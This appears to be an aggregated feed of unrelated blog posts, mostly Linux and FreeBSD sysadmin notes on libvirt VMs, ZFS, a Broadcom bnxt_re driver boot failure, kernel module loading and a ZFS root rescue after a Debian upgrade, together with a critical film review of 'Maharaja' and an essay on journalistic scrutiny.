This created a VM with 8 GB of RAM (FreeBSD's minimum recommended amount for root on ZFS), two CPUs that are just like the host, two 20 GByte disks, the right sort of networking (using the already defined libvirt network), and not trying to start any sort of console since I was ssh'd in to the VM host. Once started, I used virt-viewer on my local machine to connect to the console and went through the standard FreeBSD installer in order to gain experience with it and see how it would go when I later did this on physical hardware.
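
The virt-viewer step was a single command of roughly this shape, with the user and host names made up:

virt-viewer -c qemu+ssh://cks@vmhost/system vmguest7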

This didn't create quite the same thing that I would normally get in virt-manager; for instance, this VM was created with an 'i440FX' (virtual) chipset instead of the Q35 chipset that I normally use and that may be better (this might be fixed with '--machine q35' or perhaps '--machine pc-q35-6.2'). The 'CDROM' it wound up with is an IDE one instead of a SATA one, although FreeBSD had no objections to it. All of the various differences don't seem to be particularly important, since the result worked and I'm only doing this for testing. The VM's new disks did get sensible file names, ie ones based on the VM's name.

(When the install finished and rebooted, the VM powered off, but this might have been a peculiarity in how I did things.)

Virt-install can create transient VMs with --transient, but as its documentation notes, the disks for these VMs aren't deleted after the VM itself is cleaned up. There are probably ways to use virt-install and some additional tooling to get truly transient VMs, where even their disks are deleted afterward, but I haven't looked at that since right now it's not really a usage case I'm interested in. If I'm spinning up a VM today, I want it to stick around for at least a bit.
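
If you did want to tidy up after a --transient VM, I believe deleting the leftover disk is one more command; the storage pool and volume names here are whatever you actually used:

virsh vol-delete --pool default vmguest7.qcow2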

(I'm also not interested in virt-builder or the automatic install side of virt-install; to put it one way, I want virtual versions of our physical servers, and they're not installed through cloud-init or other completely automated ways. I do have a limited use for using guestfish to automatically modify VM filesystems.)

What a POSIX shell has to do with $PWD

By: cks

It's reasonably well known among Unix people that '$PWD' is a shell variable with the name of the current working directory. Well, sort of, because sometimes $PWD isn't right or isn't even set (all of this is part of the broader subject of shells and the current directory). Until recently, I hadn't looked up what POSIX has to say about $PWD, and when I did I was surprised, partly because I didn't expect POSIX to say anything about it.

(Until I looked it up, I had the vague impression that $PWD was a common but non-POSIX Bourne shell thing.)

What POSIX has to say is in 2.5.3 Shell Variables, part of the overall description of the POSIX shell. To put my own summary on what POSIX says, the shell creates and maintains $PWD in basically all circumstances, and is obliged to update $PWD when it does a 'cd', even in shell scripts. The only case where $PWD's value isn't specified in the shell environment is if you don't have access permissions for the current directory for some reason.

(As far as I can tell, the complicated POSIX wording boils down to that if you start the shell with a correct $PWD that uses symbolic links (eg '/u/cks' instead of '/h/281/cks'), the shell is allowed to update that to the post-symlink 'physical' version but doesn't have to. See how 'pwd -P' is described.)

However, $PWD is not necessarily correct when you're running a program written in C, because POSIX chdir() doesn't seem to be required to update $PWD for you (although it's a bit confusing, since Environment Variables seems to imply that POSIX utilities are entitled to believe $PWD is correct if it's in the environment). In fact I don't think that the POSIX shell is always obliged to export $PWD into the environment, which is why I called it a shell variable instead of an environment variable. I believe most actual Bourne shell implementations do always export $PWD, even if they're started in an environment with it undefined (where I believe POSIX allows it to not be exported).

(Bash, Dash, and FreeBSD's Almquist shell all allow $PWD to be unexported, although keeping it that way may be tricky in Dash and FreeBSD sh, which appear to re-export it any time you do a 'cd'.)
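
A quick illustration of both halves of this: the shell maintains $PWD across 'cd', but a program you run simply inherits whatever value happens to be in its environment and has to trust it:

$ cd /tmp && echo "$PWD"
/tmp
$ PWD=/somewhere-else env | grep '^PWD='
PWD=/somewhere-else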

The upshot of this is that in a modern environment where /bin/sh is a POSIX shell, $PWD will almost always be correct. It pretty much has to be correct in your POSIX shell sessions and in your POSIX shell scripts. POSIX-compatible shells like Bash will keep it correct even in their more expansive modes, and non-Bourne shells have a strong motive to go along with the show because people expect $PWD to work and be correct.

(However, this leaves me mystified about what the problem was in my specific circumstance this time around, since I'd expect $PWD to have gotten set correctly when my /bin/sh based script used 'cd'.)

Why and how I keep around spare libvirt based virtual machines

By: cks

Recently I mentioned in passing that I keep around spare virtual machines, and in comments Todd quite reasonably asked how one has such a thing (and sort of why one would bother). There are two parts to the answer, a general one and a libvirt one.

The general part is that one sort of my virtual machines sits directly on the network, not NAT'd, using specifically assigned static IPs. In order to avoid ever having two VMs accidentally use the same IP, I pre-create a VM for each reserved IP, with the (libvirt) name of the VM being its hostname. This still requires configuring each VM's OS with the right IP, but at least accidents are a lot less likely (and in my dominant use for the VMs, I do an initial install of an Ubuntu version with the right IP and then snapshot it).

The libvirt specific part is that I find it a pain in the rear to create a virtual machine, complete with creating and tracking a disk or disks for it, setting various bits and pieces up, and so on. Clever people who do this a lot could probably script it or build generic XML files or similar things, but instead I do it as little as possible, which means that I almost never delete virtual machines even if I'm not using them (although I shut them down). Right now my office desktop has ten VMs configured, none of which are normally running.

(I call this libvirt specific because it's fundamentally a user interface issue, since I could fix it with some sort of provisioning and de-provisioning script that automated all of the fiddly bits for me.)

The most important part of how I keep such VMs as 'spares' is that every time I set up a new VM, I snapshot its initial configuration, complete with a blank initial disk (under the imaginative snapshot name of 'empty-initial'). Then if I want to test something from complete scratch I don't have to go through the effort of making a new VM or erasing the disk of a currently unused one; I just find a currently unused VM, do 'virsh snapshot-revert cksvm5 empty-initial', connect the virtual DVD to an appropriate image (such as the latest FreeBSD or OpenBSD), and then run 'virsh start cksvm5'.
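(Creating that snapshot in the first place is itself a single command once the VM is defined, using the same VM name as above: 'virsh snapshot-create-as cksvm5 empty-initial'.)
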

(My earlier entry on how I've set up my libvirt based virtual machines covers the somewhat different way I handle having spare customized Ubuntu VMs that I can use to test things in our standard Ubuntu server environment.)

Using snapshots instead of creating and deleting VMs is probably a bit less efficient at the system level, but not enough for me to notice and care. Having written this, it occurs to me that I could get much the same effect by attaching and detaching virtual disks to the VMs, but with current tooling that would take more work. Libvirt's virsh command line tools make snapshots the easiest approach.

FreeBSD's 'root on ZFS' default appeals to me for an odd reason

By: cks

For reasons beyond the scope of this entry, we're probably going to take a look at FreeBSD as an alternative to OpenBSD for some of our uses of the latter. This got me to grab a 14.1 ISO image and try a quick install on a spare virtual machine (I keep spare VMs around for just such occasions). This caused me to discover that modern FreeBSD defaults to using ZFS for its root filesystem (although I didn't do this on my VM test install, because my VM has less than the recommended RAM for ZFS). FreeBSD using ZFS for its root filesystem makes me happy, but probably not quite for the reasons you're expecting.

Certainly, I like ZFS in general and I think it has a bunch of nice properties, even for a root filesystem. You get checksums for reliability, compression, the ability to easily add sub-filesystems if you want to limit the amount of space something can use (we have usage cases for this, but that's another entry), and so on. But these aren't what make me happy for it as a root filesystem on FreeBSD. The really nice thing about root on ZFS on FreeBSD for me is the easy mirroring.

A traditional thing with all of our non-Linux installs is that they don't have mirrored system disks. We've made some stabs at it in the past but at the time we found it complex and not clearly compelling, perhaps partly because we didn't have experience with their software mirroring systems. Well, we have a lot of experience with mirroring ZFS vdevs and it's trivial to set ZFS mirroring up after the fact or to revert back from a mirrored setup to a single-disk setup. So while we might not bother going through the hassles of learning a FreeBSD-specific software mirroring system, we're pretty likely to use ZFS mirroring on any production FreeBSD machines. And that will be a good thing for our FreeBSD machines in general.
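
For illustration, converting a single-disk root pool to a mirror after the fact is about one command; 'zroot' is the FreeBSD installer's default pool name, and the partition names here are made up:

zpool attach zroot ada0p4 ada1p4
zpool status zroot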

(Using ZFS for the root filesystem also eliminates any chance that the server will ever stall in boot asking us to approve a fsck, something that has happened to our OpenBSD machines under rare circumstances.)

I'm also personally pleased to see a fully supported 'root on ZFS' in anything. My impression is that FreeBSD is reasonably well used, so their choice of ZFS for the default root filesystem setup may even be exposing a reasonable number of people to (Open)ZFS and its collection of nice things.

PS: our OpenBSD machines come in pairs and we've had very good luck with their root drives, or we might have looked into the OpenBSD bioctl(8) software mirroring system and how you install to a mirror.

The Broadcom 'bnxt' Ethernet driver and RDMA (in Ubuntu 24.04)

By: cks

We have a number of Supermicro machines with dual 10G-T Broadcom based networking; specifically what they have is the 'BCM57416 NetXtreme-E Dual-Media 10G RDMA Ethernet Controller'. Under Ubuntu 22.04, everything is fine with these cards (or at least seems to be in non-production use), using the normal bnxt_en kernel driver module. Unfortunately this is not our experience in Ubuntu 24.04.

In Ubuntu 24.04, these machines also load an additional Broadcom bnxt driver, bnxt_re, which is the 'Broadcom NetXtreme-C/E RoCE' driver. RoCE is short for RDMA over Converged Ethernet, and to confuse you, this driver is found in the 'Infiniband' area of the Linux kernel drivers tree. Unfortunately, on our hardware the 24.04 bnxt_re doesn't work (or maybe the hardware doesn't work and bnxt_re is failing to detect that, although with 'RDMA' in the name of the hardware one sort of suspects it's supposed to work). The driver stalls during boot and spits out kernel messages like:

bnxt_en 0000:ab:00.0: QPLIB: bnxt_re_is_fw_stalled: FW STALL Detected. cmdq[0xf]=0x3 waited (102721 > 100000) msec active 1
bnxt_en 0000:ab:00.0 bnxt_re0: Failed to modify HW QP
infiniband bnxt_re0: Couldn't change QP1 state to INIT: -110
infiniband bnxt_re0: Couldn't start port
bnxt_en 0000:ab:00.0 bnxt_re0: Failed to destroy HW QP
[... more fun ensues ...]

This causes systemd-udev-settle.service to fail:

udevadm[1212]: Timed out for waiting the udev queue being empty.
systemd[1]: systemd-udev-settle.service: Main process exited, code=exited, status=1/FAILURE

This then causes Ubuntu 24.04's ZFS services to fail to completely start, which is a bad thing on hardware that we want to use for our ZFS fileservers.

We aren't the only people with this problem, so I was able to find various threads on the Internet, for example. These gave me the solution, which is to blacklist the bnxt_re kernel module, but at the time left me with the mystery of how and why the bnxt_re module was even being loaded in the first place.
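
For reference, the blacklisting itself is a standard modprobe configuration snippet (the file name is arbitrary, and whether you need to regenerate the initramfs depends on whether the module gets loaded that early):

# /etc/modprobe.d/blacklist-bnxt_re.conf
blacklist bnxt_re

# on Ubuntu, then possibly:
update-initramfs -u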

The answer is that bnxt_re is being loaded through the second sort of kernel driver module loading. It is an 'auxiliary' module for handling RDMA on top of the normal bnxt_en network driver, and the bnxt_en module basically asks for it to be loaded (which also suggests that at least the module thinks the hardware should be able to do RDMA properly). More specifically, bnxt_en basically asks for 'bnxt_en.rdma' to be loaded, and that is an alias for bnxt_re. Fortunately you don't have to know all of this in order to block bnxt_re from loading.

We don't have any 22.04 installs on this specific hardware any more, so I can't be completely sure what happened under 22.04, but it appears that 22.04 didn't load the bnxt_re module on these servers. Running 'modinfo' on the 22.04 module shows that it doesn't have the bnxt_en.rdma module alias it does in 24.04, so maybe you had to manually load it if your hardware had RDMA and you wanted to use it.

(Looking at kernel source history, it appears that bnxt_re support for using this 'auxiliary driver interface' only appeared in kernel 6.3, which is much too late for Ubuntu 22.04's normal server kernel, which is based on 5.15.0.)

One of my lessons learned from this is that in today's Linux kernel environment, drivers may enable additional functionality that you neither asked for nor wanted, just because it's there. We don't use RDMA and never asked for anything related to RoCE, but because the hardware is (theoretically) capable of it, we got it anyway.

Review: 'Maharaja' (2024)


Spoilers abound; trigger warning: sexual violence

In case you haven't watched the film and don't plan to, you can check out the plot description on Wikipedia.

Maharaja was bad for two reasons.

First, good films don't lie to their viewers. Maharaja did so in two instances. It lied when it led viewers to believe the Selvam/Sabari storyline was contemporaneous with the Maharaja/Lakshmi storyline. Towards the film's middle it slowly dawns on us that something's off, followed by the epiphany that the Selvam/Sabari storyline concluded before the Maharaja/Lakshmi storyline began. What was the purpose of this switch? I can't think of any beyond the film introducing a twist for a twist's sake, which is disingenuous because it had no other point to it. It's a sign of the film taking its viewership for granted.

It lied a second time: when it becomes clear Nallasivam was the fourth person in Maharaja's house that day, we realise an ostensibly comical passage of the film has become doubly redundant — until we stop and think: what was the purpose of the film depicting Inspector Varadharajan's phone calls at night to the various crooks asking them to take responsibility for pilfering the dustbin?

Varadharajan would have known by then that Nallasivam was the culprit. Even if one of the crooks he phoned had agreed to own up to the crime, Varadharajan’s plan (previously hidden from the audience) to deliver Nallasivam to Maharaja’s house would have imploded. Alternatively, if Varadharajan was only fake-calling the crooks, why did we have to spend time watching their reactions? Maharaja offers this passage as comic relief, yet such relief wasn’t necessary. In fact the film could have done itself a favour by presaging Varadharajan’s plot against Nallasivam instead of blindsiding viewers at the climax.


This review benefited from inputs from and feedback by Srividya Tadepalli.


Second, the sexual violence in the film is gratuitous. It was reminiscent of Visaranai (2015) and parts of Paatal Lok (2020). It was trauma porn. We realise Selvam, Dhana, and Nallasivam grievously injured Jothi before Nallasivam raped her multiple times. Rather than simply and directly establish that the three men perpetrated sexual violence, Maharaja split up each instance of Nallasivam raping the girl into a separate scene. We sit there and watch Nallasivam perform the act of seeking Selvam’s ‘permission’, followed by Selvam’s drawling response, and Nallasivam making excuses for what he’s about to do.

It’s possible Maharaja’s writers presumed they had to lay the groundwork to justify Varadharajan’s and Maharaja’s actions later. And yet they fail when they refuse to admit a rape once is heinous enough and then fail again when they conclude people who commit heinous crimes deserve vigilante justice.

Such justice is an expression of anger, an attempt to deter future crimes with violence. But we should know by now it fails utterly when directed against sexual violence, which erupts most often in intimate settings: when the perpetrator and the survivor are familiar with each other, more broadly when the men think they can get away with it. And most of all vigilante justice fails because it punishes once the (or a rumoured) perpetrator is caught, yet most perpetrators aren’t, which led to the dismal upwelling of voices during #MeToo. The sexual crimes we hear about constitute a small minority of all such crimes out there, which is why the best way to mitigate them has been to improve social justice.

Yet films like Maharaja persist with a vengeful narrative that concludes once the violence is delivered. I fear the only outcome might be more faith in “encounter” killings. Visaranai claimed to be fact-based but the brutality in the film served no greater purpose than to illustrate such things happen. If the film was responding to a fourth estate that had failed to highlight the underlying police impunity and the powerlessness of those at society’s margins to defend themselves, it succeeded — yet it also failed when it didn’t bother to attempt any sort of triumph, of spirit if not of will. That’s why Paatal Lok and in fact Jai Bhim (2021) were better. But Maharaja is cut from Visaranai’s cloth, and worse for being a work of imagination.

In fact, Maharaja has a ‘second’ climax during which we discover Jothi is really Ammu, Selvam’s biological daughter, and whom Maharaja has been raising since his daughter, his wife, and Selvam’s wife were killed in the same accident. There are some clues at the film’s beginning as to these (intra-narrative) facts but they're ambiguous at best and in fact just disingenuous — another lie like the other plot twist.

But further yet: why? So we can watch Selvam have his lightbulb moment when he realises Jothi was Ammu and feel bad about what he did? (This was also the climax of 2023's Iratta.) Or that men should desist from such crimes because they could be harming their own daughters? Or that viewers might be duped into thinking any kind of justice has been done when Jothi shames Selvam with boilerplate lines? Consider it a third failure.

Why having diverse interests is a virtue


Paris Marx's recent experience on the Canadaland podcast alerted me to the importance of an oft-misunderstood part of journalism in practice. When Paris Marx and his host Justin Ling were recording the podcast, Marx said something about Israel conducting a genocide in Gaza. After the show was recorded, the publisher of Canadaland, a fellow named Jesse Brown, edited that bit out. When Marx as well as Ling complained, Brown reinstated the comment by having Marx re-record it to attribute that claim to some specific sources. Now, following Marx’s newsletter and Ling’s statement about Brown’s actions, Brown has been saying on Twitter that Marx's initial comment, that many people have been saying Israel is conducting a genocide in Gaza, wasn't specific enough and that it needed to have specific sources.

Different publications have different places where they draw the line on how much they'd like their content to be attributed. And frankly, there's nothing wrong, unfair, or unethical about this. As the commentary and narratives around Israel's violence in West Asia have alerted us, the facts as we consider them are often not set in stone even when they have very clear definitions. We're seeing, in a way that is obnoxious from our perspective, many people disputing the claim that Israel is conducting a genocide and contesting whether it is a fact that Israel's actions constitute a genocide. Depending on the community to and for which you are being a journalist, it becomes okay for some things to be attributed to no one and just generally considered true, and for others not so much.

This is fundamentally because each one of us has a different level of access to all the relevant information as well as because the existence of facts other than those that we can experience through our senses (i.e. empirically) is controlled by some social determinants as well.

This whole Canadaland episode alerted me to the people trying to repudiate the allegation that Israel is conducting a genocide — especially many who are journalists by vocation — by purporting to scrutinise the claims they are being presented with. Now, scrutiny in and of itself is a good thing; it's one of the cornerstones of scepticism, especially a reasonable exercise of scepticism. But what they're scrutinising also matters, and that is a subjective call. I use the word 'subjective' with deliberate intent. Scrutiny in journalism is a good thing (I'm treating Canadaland as a journalistic outlet here), yet it's important to cultivate a good sense of what can and ought to be scrutinised, versus a scrutiny that only suggests the scrutiniser is being obstinate or intends to waste time.

Many, if not all, journalists would have started off being told it's important to be alert, to scrutinise all the claims they encounter. Many journalists also cultivate this sense over time, and the process by which they do so allows subjective considerations to seep in — and that is not in and of itself a bad thing. In fact it's good. I have often come across editors who, based solely on their news sense, predicted a particular story's popularity where others only saw a dud. This is not a clinical scientific technique; it's by all means a sense. Informing this sense are, among other things, the pulse of the people to whom you're trying to appeal, the things they value, the things they used to value but don't any more, and so forth. In other words this sense or pulse has an important socio-cultural component to it, and it is within this milieu that scrutiny happens.

Scrutinising something in and of itself is not always a virtue for this reason: in the process of scrutinising something, it’s possible for you to end up appealing to things that people don’t consider virtues or, worse, which they could interpret to mean you’re vouching for something they consider antithetical to their spirit as a people.

This Marx-Ling-Brown incident is illustrative to the extent that it spotlights the many journalists waking up to a barrage of statements, claims, and assertions both on and off the internet that Israel is conducting a genocide in Gaza. These claims are stinging them, cutting at the heart of something they value, something they hold close to their hearts as a community. So they're responding by subjecting these claims to some tough scrutiny. Many of us have spent many years applying the same sort of tests to many, many other claims. For example, science journalists had to wade through a lot of bullshit before we could surmount the tide of climate denialism and climate pacifism to get to where we are today.

However, now we're seeing these other people, including journalists, subjecting, of all things, the claim that Israel is conducting a genocide in Gaza to especial scrutiny. I think they're waking up to the importance of scepticism and scrutiny through this particular news incident. Many of us woke up before, and many of us will wake up in future, through specific incidents that are close to us, incidents that we know, more keenly than most others do, will have a very bad effect on society. These incidents are a sort of catalyst but they are also more than that — a kind of awakening.

You learn how to scrutinise things in journalism school, you understand the theory of it very quickly. It's very simple. But in practice, it's a different beast. They say you need to fact check every claim in a reporter's copy. But over time, what you do is you draw the line somewhere and say, "Beyond this point, I'm not going to fact check this copy because the author is a very good reporter and my experience has been that they don't make any statements or claims that don't stand up to scrutiny beyond a particular level." You develop and accrue these habits of journalism in practice because you have to. There are time constraints and mental bandwidth constraints, so you come up with some shortcuts. This is a good thing, but acknowledging this is also important and valuable rather than sweeping it under the rug and pretending you don't do it.


If you want to be a good journalist, you have to cultivate for yourself the right conduits of awakening — and by "right" I mean those conduits that will awaken you to the pulses of the people and the beats you’re responsible for rather than serve some counterproductive purpose. These conduits should specifically do two things. One: they should awaken you as quickly and with as much clarity as possible to what it means to fact check or scrutinise something. It should teach you the purpose of it, why you do it. It should teach you what good scrutiny looks like and where the line is between scrutiny and nitpicking or pedantry. Two: it should alert you to, or alert others about, your personal sense of right and wrong, good and bad. That's why it's a virtue to cultivate as many conduits as possible, that is to have diverse interests.

When we're interested in many things about the world, about the communities and the societies that we live in, we are over time awakened again and again. We learn how to subject different claims to different levels of scrutiny because that experience empirically teaches us what, when, and how to scrutinise and, importantly, why. Today we're seeing many of these people wake up and apply the tests that we've administered to climate denialism, the anti-vaccine movement, and various other pseudo-scientific movements to the claim that Israel is conducting a genocide. When we look at them we see stubborn people who won't admit simple details that are staring us in the face. This disparity arises because of how we construct our facts, the virtues to which we would like to appeal, and the position of the line beyond which we say no further attribution is necessary.

Obviously there is no such thing as the view from nowhere, and I'm clear that I'm almost always appealing to the people who are not right-wingers. So from where I'm standing it seems more often than not as if the tests being administered to, say, the anti-vaccine movement are more valid instances of their use than the tests being administered against claims that Israel is conducting a genocide.

Such divisions arise when we don't cultivate ourselves as individuals, when we don't nurture ourselves and the things that we're interested in. Simply, it speaks to the importance of having diverse interests. It's like travelling the world, meeting many people, experiencing many cultures. Such experiences teach us about multiculturalism and why it's valuable, and they teach us the precise ways in which xenophobia, authoritarianism, and nationalism effect their baleful consequences. In a very similar way, diverse interests are good teachers about the moral landscape we all share and its normative standards that we co-define. They can quickly teach you how far you stand from where you might really like to be.

In fact, it's entirely possible for a right-winger to read this post and take away the idea that where they stand is right. As I said, there is no view from nowhere. Right and wrong depend on your vantage point, in most cases at least. I wanted to put these thoughts down because it seemed like people who may not have many interests, or who have very limited interests, are also more likely to disengage from social issues earlier than others. Disengagement is the fundamental problem, the root cause. There are many reasons why it arises in the first place, but getting rid of it is entirely possible, and importantly something we need to do. And a good way to do that is to cultivate many interests, to be interested in many problems, so that over time our experiences navigating those interests inevitably lead to a good sense of what we should and what we needn't scrutinise. That sense will teach us why some particular points of an argument are ill-founded. And if we're looking for it, it will give us a chance to fix that and even light the way.

Rescuing ZFS

Last week I decided to upgrade the Debian operating system on one of my servers. In principle the upgrade is simple - you put the new package repositories into sources.list, then run apt-get -y update, apt-get -y upgrade and apt-get -y full-upgrade (plus a few other small things). I duly did all of that, and at the end all that remained was the reboot command to restart the system. A minute or two of waiting - and the server should wake up with an upgraded operating system. Except that this didn't happen. Not after five minutes, not after ten. Which is... an alarm signal. Especially when the server is at the other end of... Slovenia (or Europe, it makes no difference).

PiKVM

Fortunately, a PiKVM was attached to the server. This is a small device that provides remote access to and remote management of computers. The PiKVM is basically an add-on board (a so-called 'hat') that you attach to a Raspberry Pi. You then connect the PiKVM to a computer in place of a monitor and keyboard/mouse - to the computer, the PiKVM looks like a virtual monitor, virtual keyboard, mouse, CD, USB stick, and so on. Through it you can manage a computer or server remotely (you can even enter the BIOS, virtually press the power button or the reset button) - all from a web browser. The software is completely open source, and it also supports connecting through a KVM switch, which lets you remotely manage several computers - ideal for mounting in a data center, for example.

The PiKVM as purchased.

Anyway, when the server had been unresponsive for a while, I connected to the PiKVM and went to see what had actually happened. And what had happened was... a catastrophe.

The problem

After the reboot, the server had gotten stuck in the initramfs. Aaaaaa! And at the bottom of the screen glowed one final warning before the system expired for good - ALERT! ZFS=rpool/ROOT/debian does not exists. Dropping to a shell!. In my despair I overlooked that 's' and read 'hell'...

At that moment I remembered that the server's root partition was, of course, running the ZFS filesystem - an encrypted one at that - and during the upgrade I had naturally forgotten to manually enable the kernel modules that let the operating system recognize ZFS at boot. And to make things worse - the server ran (well, not any more) a number of virtual servers. All of which were now, of course, unreachable.

A note: ZFS (Zettabyte File System) is an advanced filesystem known for its reliability, its scalability, its use of advanced error detection and correction techniques (which ensure that data is always consistent and uncorrupted), its use of compression and deduplication, and so on. In short, ideal for server environments.

Good, now we know what the problem is, but how do we solve it?

The rescue plan

To recover at least a little from the shock, I first made myself a strong coffee. That decision turned out to be strategic, since the rescue dragged on late into the night (and into the following morning).

After a little thought, the following plan took shape in my head. First, boot the system from a Debian live CD, install ZFS support onto that temporary system, attach the ZFS disks, chroot into the old system, repair the damage there, and reboot the whole thing. And that's it!

At this point, in an old movie, I would simply mount my horse and ride off into the sunset, but as it turned out, the road to the horse (and its saddle) was... still rather thorny. So let's take it step by step.

The PiKVM in action.

First I uploaded the file debian-live-12.6.0-amd64-standard.iso to the PiKVM, attached it as a virtual CD, and booted the server. This part was genuinely easy, and the PiKVM once again proved to be worth its money.

However, it became clear right at the start that the server only recognizes a US keyboard layout. And since mine is Slovenian, I first had to figure out which key to press to get exactly the special character I needed. Here are a few of the characters I used most often on the Slovenian keyboard and their 'translations' to the US keyboard:

- /
? - 
Ž |
+ =
/ &

Light at the end of the tunnel

The next step was to add the contrib repository to the live system's /etc/apt/sources.list. After that I could install ZFS support: sudo apt update && sudo apt install linux-headers-amd64 zfsutils-linux zfs-dkms zfs-zed.

A minute or two later I could load the ZFS kernel modules: sudo modprobe zfs. The zfs version command showed that ZFS support now worked:

zfs-2.1.11-1
zfs-kmod-2.1.11-1

So the first step had succeeded; now 'all' that remained was to attach the existing disks to the system. First I made a suitable directory to mount the disks under: sudo mkdir /sysroot.

Then I tried to attach my 'rpool' ZFS pool to it. The commands below are only approximate (you probably need to do a few more things, such as setting the mountpoint), but they may serve as a guide for anyone with similar problems. I should add that it did not go entirely smoothly, and quite a bit of gymnastics was needed to reach the final goal.

sudo zpool import -N -R /sysroot rpool -f

sudo zpool status
sudo zpool list
sudo zfs get mountpoint

At this point I entered the encryption passphrase: sudo zfs load-key rpool... and checked that the ZFS was unlocked: sudo zfs get encryption,keystatus.

Now the mount: sudo zfs mount rpool/ROOT/debian. And there it was - the data was visible, and by the look of it nothing had been lost!

Reviving the 'patient'...

Finally came the chroot into the old system:

sudo mkdir /sysroot/mnt
sudo mkdir /sysroot/mnt/dev
sudo mkdir /sysroot/mnt/proc
sudo mkdir /sysroot/mnt/sys
sudo mkdir /sysroot/mnt/run
sudo mount -t tmpfs tmpfs /sysroot/mnt/run
sudo mkdir /sysroot/mnt/run/lock

sudo mount --make-private --rbind /dev /sysroot/mnt/dev
sudo mount --make-private --rbind /proc /sysroot/mnt/proc
sudo mount --make-private --rbind /sys /sysroot/mnt/sys

sudo chroot /sysroot/mnt /usr/bin/env DISK=$DISK bash --login

I was now successfully inside the old ('broken') system. The first task was to install ZFS support into it:

apt install --yes dpkg-dev linux-headers-generic linux-image-generic
apt install --yes zfs-initramfs
echo REMAKE_INITRD=yes > /etc/dkms/zfs.conf

...with minor complications

Of course, another error cropped up along the way: packages could not be installed because of a broken systemd package. I solved that with:

sudo rm /var/lib/dpkg/info/systemd*
sudo dpkg --configure -D 777 systemd
sudo apt -f install

Then, of course, unresolved dependencies appeared... I no longer remember exactly how I managed to solve those, but the following commands helped (not necessarily in this order):

dpkg --force-all --configure -a
apt --fix-broken install
apt-get -f install

Next, the EFI partition had to be mounted (and first I had to figure out where exactly it even was):

cp -r /boot /tmp
zpool import -a
lsblk
mount /dev/nvme0n1p2 /boot/efi
cd /tmp
cp * /boot/

Now for real!

Finally I could run the commands that add the ZFS kernel modules to the operating system kernel:

update-initramfs -c -k all
dkms autoinstall
dkms status
update-grub
grub-install

And then, finally, came the reboot; after it I still had to fix the ZFS mountpoint (zfs set mountpoint=/ rpool/ROOT/debian)... one more reboot - and the old system rose from the dead.

Repairing the damage after the fact

Because of all the frantic wizardry and the not-quite-finished upgrade, I had to install the missing packages, reinstall a few systemd packages, and remove old operating system kernels. All by hand, of course.

Oh, and for some reason the SSH server vanished during the upgrade. But fixing that was child's play by this point.

Then came a reboot, and then one more reboot, to check that everything really works.

All's well that ends well

And now it works. Oh, how nicely it works! ZFS is encrypted, the system boots up nicely after the unlock passphrase is entered, and the virtual servers start automatically as well. And the PiKVM has earned a very special place in my heart.

Until next time, or however the saying goes! :)

P.S. Thanks also to Jure for his help. Without his advice the whole thing would have taken considerably longer.

How Linux kernel driver modules for hardware get loaded (I think)

By: cks

Once upon a time, a long time ago, the kernel modules for your hardware got loaded during boot because they were listed explicitly as 'load these modules' in configuration files somewhere. You can still explicitly list modules this way (and you may need to for things like IPMI drivers), but most hardware driver modules aren't loaded like this any more. Instead they get loaded through udev, through what I believe is two mechanisms.

The first mechanism is that as the kernel inventories things like PCIe devices, it generates udev events with 'MODALIAS' set in them in a way that incorporates the PCIe vendor and device/model numbers. At the same time, kernel modules declare all of the PCIe vendor and model values that they support, which are turned into (somewhat wild carded) module aliases that you can inspect with 'modinfo', for example:

$ modinfo bnxt_en
description: Broadcom BCM573xx network driver
license:     GPL
alias:       pci:v000014E4d0000D800sv*sd*bc*sc*i*
alias:       pci:v000014E4d00001809sv*sd*bc*sc*i*
[...]
alias:       pci:v000014E4d000016D8sv*sd*bc*sc*i*
[...]

(The other parts of the pci MODALIAS value are apparently, in order, the subsystem vendor, the subsystem device/model, the base class, the sub class, and the 'programming interface'. See the Arch Wiki entry on modalias.)

As I understand things (and udev rules), when udev processes a kernel udev event with a MODALIAS set, it will attempt to load a kernel module that matches the name. Usually this will be done through wild card matching against aliases, as in the case of Broadcom BCM573xx cards; a supported card will have its PCIe vendor and device listed as an alias, so udev will wind up loading bnxt_en for it.
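
You can see both halves of this matching from user space; the device path and alias value below are illustrative, in the style of the Broadcom example above:

$ cat /sys/bus/pci/devices/0000:ab:00.0/modalias
pci:v000014E4d000016D8sv000014E4sd000016D8bc02sc00i00
$ modprobe --resolve-alias 'pci:v000014E4d000016D8sv000014E4sd000016D8bc02sc00i00'
bnxt_en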

The second mechanism is through something called the Auxiliary 'bus'. To put my own spin on it, this is a way for core hardware drivers to declare (possibly only under some situations) that loading an additional driver can enable extra functionality. When the main driver loads and registers itself, it will register a pseudo-device on the 'auxiliary bus'. This bus registration generates a udev event with a MODALIAS that starts with 'auxiliary:' and apparently is generally formatted as 'auxiliary:<core driver>.<some-feature>', for example 'auxiliary:bnxt_en.rdma'. When this pseudo-device is registered, the udev event goes out from the kernel, is picked up by udev, and triggers an attempt to load whatever kernel module has declared that name as an alias. For example:

$ modinfo bnxt_re
[...]
description: Broadcom NetXtreme-C/E RoCE Driver
[...]
alias:       auxiliary:bnxt_en.rdma
depends:     ib_uverbs,ib_core,bnxt_en
[...]

(Inside the kernel, the two kernel modules use this pseudo-device on the auxiliary bus to connect with each other.)

As far as I know, the main kernel driver modules don't explicitly publish information on what auxiliary bus things they may trigger; the information exists only in their code. You can attempt to go the other way by looking for modules that declare themselves as auxiliaries for something else. This is most conveniently done by looking for 'auxiliary:' in /lib/modules/<version>/modules.alias.
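
For example, to see what (if anything) claims the bnxt_en RDMA hook on the kernel you're running:

$ grep 'auxiliary:bnxt_en' /lib/modules/$(uname -r)/modules.alias
alias auxiliary:bnxt_en.rdma bnxt_re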

(Your results may depend on the specific kernel versions and build options involved, and perhaps what additional packages have been added. On my Fedora 40 machine with 6.9.12, there are 37 auxiliary: aliases; on an Ubuntu 24.04 machine with '6.8.0-39', there are 49, with the extras coming from the peci_cputemp and peci_dimmtemp kernel modules.)

PS: PCI(e) devices aren't the only thing that this kernel module alias facility is used for. There are a whole collection of USB modaliases, a bunch of 'i2c' and 'of' ones, a number of 'hid' ones, and so on.

Host names in syslog messages may not be quite what you expect

By: cks

Over on the Fediverse, I said something:

It has been '0' days since I (re)discovered that the claimed hostname in syslog messages can be utter junk, and you may be going to live a fun life if you use it for anything much.

Suppose that on your central syslog server you see a syslog line of the form:

[...] alkyone exim[864974]: no host name found for IP address 115.187.17.119

